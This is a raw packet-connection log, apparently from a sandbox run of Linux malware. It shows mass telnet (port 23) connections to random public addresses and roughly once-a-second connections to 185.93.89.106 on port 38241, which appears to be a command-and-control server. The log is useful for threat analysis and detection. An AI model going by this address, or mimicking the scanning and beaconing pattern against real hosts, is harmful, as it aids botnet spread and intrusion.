Feb 10, 2025 20:19:06.734778881 CET	23	53222	181.69.121.168	192.168.2.23
Feb 10, 2025 20:19:06.734783888 CET	23	33864	63.190.64.54	192.168.2.23
Feb 10, 2025 20:19:06.734787941 CET	23	45722	34.163.125.203	192.168.2.23
Feb 10, 2025 20:19:06.734792948 CET	23	49688	134.12.253.14	192.168.2.23
Feb 10, 2025 20:19:06.734797001 CET	23	33348	88.171.2.111	192.168.2.23
Feb 10, 2025 20:19:06.734802961 CET	23	48540	38.207.138.11	192.168.2.23
Feb 10, 2025 20:19:06.734812021 CET	23	42214	83.43.155.209	192.168.2.23
Feb 10, 2025 20:19:06.734816074 CET	23	43776	209.123.240.12	192.168.2.23
Feb 10, 2025 20:19:06.734819889 CET	23	36574	167.37.240.222	192.168.2.23
Feb 10, 2025 20:19:06.734823942 CET	23	37184	160.181.150.86	192.168.2.23
Feb 10, 2025 20:19:06.734828949 CET	23	60208	11.152.5.38	192.168.2.23
Feb 10, 2025 20:19:06.734846115 CET	23	34928	123.36.135.99	192.168.2.23
Feb 10, 2025 20:19:06.734849930 CET	23	37996	175.208.67.239	192.168.2.23
Feb 10, 2025 20:19:06.734858990 CET	23	42664	146.247.117.190	192.168.2.23
Feb 10, 2025 20:19:06.734863997 CET	23	50474	1.186.178.181	192.168.2.23
Feb 10, 2025 20:19:06.734872103 CET	23	53256	161.122.26.73	192.168.2.23
Feb 10, 2025 20:19:06.734877110 CET	23	43694	32.79.80.242	192.168.2.23
Feb 10, 2025 20:19:06.734880924 CET	23	34636	133.215.189.21	192.168.2.23
Feb 10, 2025 20:19:06.734885931 CET	23	50032	202.10.137.75	192.168.2.23
Feb 10, 2025 20:19:06.734895945 CET	23	36556	211.3.132.140	192.168.2.23
Feb 10, 2025 20:19:06.734900951 CET	23	37976	78.140.32.79	192.168.2.23
Feb 10, 2025 20:19:06.734937906 CET	23	55416	50.21.2.183	192.168.2.23
Feb 10, 2025 20:19:06.734942913 CET	23	37104	52.94.168.245	192.168.2.23
Feb 10, 2025 20:19:06.734951973 CET	23	55218	28.225.89.160	192.168.2.23
Feb 10, 2025 20:19:06.734956980 CET	23	48054	198.2.243.223	192.168.2.23
Feb 10, 2025 20:19:06.734961033 CET	23	39346	213.248.159.188	192.168.2.23
Feb 10, 2025 20:19:06.734965086 CET	23	34672	63.174.223.29	192.168.2.23
Feb 10, 2025 20:19:06.734980106 CET	23	58640	52.238.108.30	192.168.2.23
Feb 10, 2025 20:19:06.751049995 CET	23	58640	52.238.108.30	192.168.2.23
Feb 10, 2025 20:19:06.751066923 CET	23	34672	63.174.223.29	192.168.2.23
Feb 10, 2025 20:19:06.751085997 CET	23	39346	213.248.159.188	192.168.2.23
Feb 10, 2025 20:19:06.751091957 CET	23	48054	198.2.243.223	192.168.2.23
Feb 10, 2025 20:19:06.751123905 CET	23	55218	28.225.89.160	192.168.2.23
Feb 10, 2025 20:19:06.751148939 CET	39346	23	192.168.2.23	213.248.159.188
Feb 10, 2025 20:19:06.751148939 CET	48054	23	192.168.2.23	198.2.243.223
Feb 10, 2025 20:19:06.751152039 CET	58640	23	192.168.2.23	52.238.108.30
Feb 10, 2025 20:19:06.751161098 CET	34672	23	192.168.2.23	63.174.223.29
Feb 10, 2025 20:19:06.751198053 CET	23	37104	52.94.168.245	192.168.2.23
Feb 10, 2025 20:19:06.751221895 CET	55218	23	192.168.2.23	28.225.89.160
Feb 10, 2025 20:19:06.751245022 CET	23	55416	50.21.2.183	192.168.2.23
Feb 10, 2025 20:19:06.751245975 CET	37104	23	192.168.2.23	52.94.168.245
Feb 10, 2025 20:19:06.751250029 CET	23	37976	78.140.32.79	192.168.2.23
Feb 10, 2025 20:19:06.751255989 CET	23	36556	211.3.132.140	192.168.2.23
Feb 10, 2025 20:19:06.751317978 CET	36556	23	192.168.2.23	211.3.132.140
Feb 10, 2025 20:19:06.751319885 CET	55416	23	192.168.2.23	50.21.2.183
Feb 10, 2025 20:19:06.751319885 CET	37976	23	192.168.2.23	78.140.32.79
Feb 10, 2025 20:19:06.751329899 CET	23	50032	202.10.137.75	192.168.2.23
Feb 10, 2025 20:19:06.751336098 CET	23	34636	133.215.189.21	192.168.2.23
Feb 10, 2025 20:19:06.751341105 CET	23	43694	32.79.80.242	192.168.2.23
Feb 10, 2025 20:19:06.751344919 CET	23	53256	161.122.26.73	192.168.2.23
Feb 10, 2025 20:19:06.751358986 CET	23	50474	1.186.178.181	192.168.2.23
Feb 10, 2025 20:19:06.751363993 CET	23	42664	146.247.117.190	192.168.2.23
Feb 10, 2025 20:19:06.751363993 CET	50032	23	192.168.2.23	202.10.137.75
Feb 10, 2025 20:19:06.751374960 CET	34636	23	192.168.2.23	133.215.189.21
Feb 10, 2025 20:19:06.751390934 CET	23	37996	175.208.67.239	192.168.2.23
Feb 10, 2025 20:19:06.751398087 CET	53256	23	192.168.2.23	161.122.26.73
Feb 10, 2025 20:19:06.751400948 CET	43694	23	192.168.2.23	32.79.80.242
Feb 10, 2025 20:19:06.751406908 CET	42664	23	192.168.2.23	146.247.117.190
Feb 10, 2025 20:19:06.751406908 CET	50474	23	192.168.2.23	1.186.178.181
Feb 10, 2025 20:19:06.751430035 CET	37996	23	192.168.2.23	175.208.67.239
Feb 10, 2025 20:19:06.751434088 CET	23	34928	123.36.135.99	192.168.2.23
Feb 10, 2025 20:19:06.751441002 CET	23	60208	11.152.5.38	192.168.2.23
Feb 10, 2025 20:19:06.751473904 CET	23	37184	160.181.150.86	192.168.2.23
Feb 10, 2025 20:19:06.751478910 CET	23	36574	167.37.240.222	192.168.2.23
Feb 10, 2025 20:19:06.751481056 CET	34928	23	192.168.2.23	123.36.135.99
Feb 10, 2025 20:19:06.751482964 CET	23	43776	209.123.240.12	192.168.2.23
Feb 10, 2025 20:19:06.751486063 CET	60208	23	192.168.2.23	11.152.5.38
Feb 10, 2025 20:19:06.751487970 CET	23	42214	83.43.155.209	192.168.2.23
Feb 10, 2025 20:19:06.751501083 CET	23	48540	38.207.138.11	192.168.2.23
Feb 10, 2025 20:19:06.751518965 CET	36574	23	192.168.2.23	167.37.240.222
Feb 10, 2025 20:19:06.751543999 CET	43776	23	192.168.2.23	209.123.240.12
Feb 10, 2025 20:19:06.751544952 CET	23	33348	88.171.2.111	192.168.2.23
Feb 10, 2025 20:19:06.751547098 CET	37184	23	192.168.2.23	160.181.150.86
Feb 10, 2025 20:19:06.751560926 CET	48540	23	192.168.2.23	38.207.138.11
Feb 10, 2025 20:19:06.751571894 CET	42214	23	192.168.2.23	83.43.155.209
Feb 10, 2025 20:19:06.751596928 CET	33348	23	192.168.2.23	88.171.2.111
Feb 10, 2025 20:19:06.751606941 CET	23	49688	134.12.253.14	192.168.2.23
Feb 10, 2025 20:19:06.751612902 CET	23	45722	34.163.125.203	192.168.2.23
Feb 10, 2025 20:19:06.751621962 CET	23	33864	63.190.64.54	192.168.2.23
Feb 10, 2025 20:19:06.751627922 CET	23	53222	181.69.121.168	192.168.2.23
Feb 10, 2025 20:19:06.751643896 CET	23	37104	163.135.230.101	192.168.2.23
Feb 10, 2025 20:19:06.751646996 CET	49688	23	192.168.2.23	134.12.253.14
Feb 10, 2025 20:19:06.751662016 CET	53222	23	192.168.2.23	181.69.121.168
Feb 10, 2025 20:19:06.751662970 CET	45722	23	192.168.2.23	34.163.125.203
Feb 10, 2025 20:19:06.751662970 CET	33864	23	192.168.2.23	63.190.64.54
Feb 10, 2025 20:19:06.751683950 CET	37104	23	192.168.2.23	163.135.230.101
Feb 10, 2025 20:19:06.751728058 CET	23	43386	75.184.195.174	192.168.2.23
Feb 10, 2025 20:19:06.751734018 CET	23	37126	108.58.16.54	192.168.2.23
Feb 10, 2025 20:19:06.751738071 CET	23	42352	197.122.2.94	192.168.2.23
Feb 10, 2025 20:19:06.751741886 CET	23	40202	175.202.252.137	192.168.2.23
Feb 10, 2025 20:19:06.751751900 CET	23	55204	163.224.220.195	192.168.2.23
Feb 10, 2025 20:19:06.751770020 CET	43386	23	192.168.2.23	75.184.195.174
Feb 10, 2025 20:19:06.751775980 CET	42352	23	192.168.2.23	197.122.2.94
Feb 10, 2025 20:19:06.751776934 CET	40202	23	192.168.2.23	175.202.252.137
Feb 10, 2025 20:19:06.751777887 CET	37126	23	192.168.2.23	108.58.16.54
Feb 10, 2025 20:19:06.751780987 CET	55204	23	192.168.2.23	163.224.220.195
Feb 10, 2025 20:19:06.751791000 CET	23	43680	41.83.76.194	192.168.2.23
Feb 10, 2025 20:19:06.751796007 CET	23	49436	211.140.50.110	192.168.2.23
Feb 10, 2025 20:19:06.751805067 CET	23	56048	192.35.75.23	192.168.2.23
Feb 10, 2025 20:19:06.751816034 CET	23	34310	25.116.95.17	192.168.2.23
Feb 10, 2025 20:19:06.751830101 CET	23	49576	188.35.191.195	192.168.2.23
Feb 10, 2025 20:19:06.751876116 CET	56048	23	192.168.2.23	192.35.75.23
Feb 10, 2025 20:19:06.751877069 CET	43680	23	192.168.2.23	41.83.76.194
Feb 10, 2025 20:19:06.751880884 CET	49436	23	192.168.2.23	211.140.50.110
Feb 10, 2025 20:19:06.751883030 CET	34310	23	192.168.2.23	25.116.95.17
Feb 10, 2025 20:19:06.751883030 CET	49576	23	192.168.2.23	188.35.191.195
Feb 10, 2025 20:19:07.694776058 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:07.699567080 CET	38241	39772	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:07.699635983 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:07.700495958 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:07.705241919 CET	38241	39772	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:07.705303907 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:07.710140944 CET	38241	39772	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:08.307205915 CET	38241	39772	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:08.307293892 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:08.307374954 CET	39772	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.319793940 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.324585915 CET	38241	39774	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:09.324671030 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.325763941 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.330602884 CET	38241	39774	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:09.330652952 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.335412025 CET	38241	39774	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:09.927752972 CET	38241	39774	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:09.927879095 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:09.927879095 CET	39774	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:10.278619051 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:19:10.937941074 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:10.942761898 CET	38241	39776	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:10.942807913 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:10.943993092 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:10.948906898 CET	38241	39776	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:10.948946953 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:10.953839064 CET	38241	39776	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:11.551168919 CET	38241	39776	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:11.551251888 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:11.551295996 CET	39776	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:11.814409018 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:19:12.560300112 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:12.565186977 CET	38241	39778	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:12.565274954 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:12.566617966 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:12.571465969 CET	38241	39778	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:12.571523905 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:12.576280117 CET	38241	39778	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:13.202774048 CET	38241	39778	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:13.202882051 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:13.202882051 CET	39778	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.215518951 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.220309973 CET	38241	39780	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:14.220392942 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.221333981 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.226113081 CET	38241	39780	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:14.226335049 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.231132030 CET	38241	39780	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:14.822014093 CET	38241	39780	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:14.822099924 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:14.822148085 CET	39780	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:15.830629110 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:15.835525990 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:15.835580111 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:15.836344957 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:15.841150999 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:15.841203928 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:15.846079111 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:16.437196016 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:16.437282085 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:16.437325001 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:17.445616007 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:17.450419903 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:17.450474024 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:17.451178074 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:17.455945969 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:17.455997944 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:17.460805893 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:18.073777914 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:18.074075937 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:18.074115038 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.082701921 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.087532043 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:19.087594032 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.088341951 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.093122959 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:19.093167067 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.097906113 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:19.690262079 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:19.690347910 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:19.690399885 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:20.698812008 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:20.703659058 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:20.703725100 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:20.704583883 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:20.709376097 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:20.709440947 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:20.714224100 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:21.305382013 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:21.305463076 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:21.305517912 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.314327002 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.319164038 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:22.319224119 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.320074081 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.324862957 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:22.324928999 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.329690933 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:22.941720963 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:22.941792965 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:22.941834927 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:23.950484037 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:23.955375910 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:23.955492973 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:23.956321001 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:23.961131096 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:23.961205006 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:23.966070890 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:24.578876019 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:24.578963995 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:24.579009056 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:25.592197895 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:25.597034931 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:25.597136974 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:25.597924948 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:25.602715015 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:25.602768898 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:25.607563019 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:26.199038029 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:26.199127913 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:26.199183941 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:26.404407024 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:19:27.207562923 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:27.213578939 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:27.213707924 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:27.214564085 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:27.219366074 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:27.219419956 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:27.224179029 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:27.838814020 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:27.838905096 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:27.838936090 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:28.850953102 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:28.855772018 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:28.855912924 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:28.857470989 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:28.862339020 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:28.862396002 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:28.867228985 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:29.468872070 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:29.468967915 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:29.469022036 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:30.477796078 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:30.482665062 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:30.482851982 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:30.483827114 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:30.489095926 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:30.489180088 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:30.493951082 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:31.104244947 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:31.104311943 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:31.104397058 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.112961054 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.117786884 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:32.117872000 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.118732929 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.123622894 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:32.123666048 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.128484964 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:32.747231007 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:32.747294903 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:32.747348070 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:33.757730007 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:33.768667936 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:33.768743038 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:33.769685030 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:33.774740934 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:33.774820089 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:33.779572964 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:34.371308088 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:34.371452093 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:34.371489048 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:35.380157948 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:35.384974957 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:35.385097980 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:35.385977983 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:35.390738010 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:35.390801907 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:35.395554066 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:36.002932072 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:36.003051996 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:36.003118992 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:36.642935991 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:19:37.011665106 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:37.016452074 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:37.016532898 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:37.017328024 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:37.022114038 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:37.022223949 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:37.027053118 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:37.618778944 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:37.619026899 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:37.619026899 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:38.631560087 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:38.636378050 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:38.636487961 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:38.637336016 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:38.642124891 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:38.642179012 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:38.646962881 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:39.273171902 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:39.273324966 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:39.273360014 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.282022953 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.286844969 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:40.286931992 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.287741899 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.292546034 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:40.292653084 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.297413111 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:40.916739941 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:40.916851997 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:40.916887999 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:41.929209948 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:41.934031010 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:41.934084892 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:41.935401917 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:41.940201044 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:41.940253019 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:41.945036888 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:42.540921926 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:42.541040897 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:42.541069984 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:42.786083937 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:19:43.550326109 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:43.555171967 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:43.555223942 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:43.555979967 CET	39816	38241	192.168.2.23	185.93.89.106
